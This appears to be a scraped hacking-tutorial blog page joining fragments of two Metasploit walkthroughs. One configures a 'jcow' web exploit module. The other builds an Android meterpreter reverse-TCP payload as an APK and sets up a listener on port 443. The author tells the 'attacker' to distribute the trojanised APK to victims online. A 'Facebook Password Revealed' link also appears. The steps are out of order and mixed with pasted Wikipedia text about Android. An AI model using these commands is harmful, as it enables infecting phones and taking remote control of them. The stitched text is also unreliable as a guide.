Click Here to Download PSDrive Android App
Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
the text "framework" with blue color it's because I'm using Backtrack 5 R1 and using metasploit v4.0.1, so the name was depends on your Metasploit version, maybe on your computer it can be "framework3" or "framework2" so on..cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/
3. The next step we need to view the available switch for this exploit by running show options command, and then configured it(see the box with red color).msf > use exploit/remote/jcow
Information :msf exploit(jcow) > set rhost 192.168.8.94 --> set the target IP rhost => 192.168.8.94 msf exploit(jcow) > set username victim --> set the username username => victim msf exploit(jcow) > set password victim --> set the password password => victim msf exploit(jcow) > set uri jcow --> only if jcow not in / directory fill it here uri => jcow
Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.and what is APK? according to wikipedia:
Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.Here is some initial information for this tutorial:
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command
use exploit/multi/handler –> we will use Metasploit handler4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
set lhost 192.168.8.94 –> attacker IP address5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution ).
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection
|Facebook Password Revealed +Maven Scientists|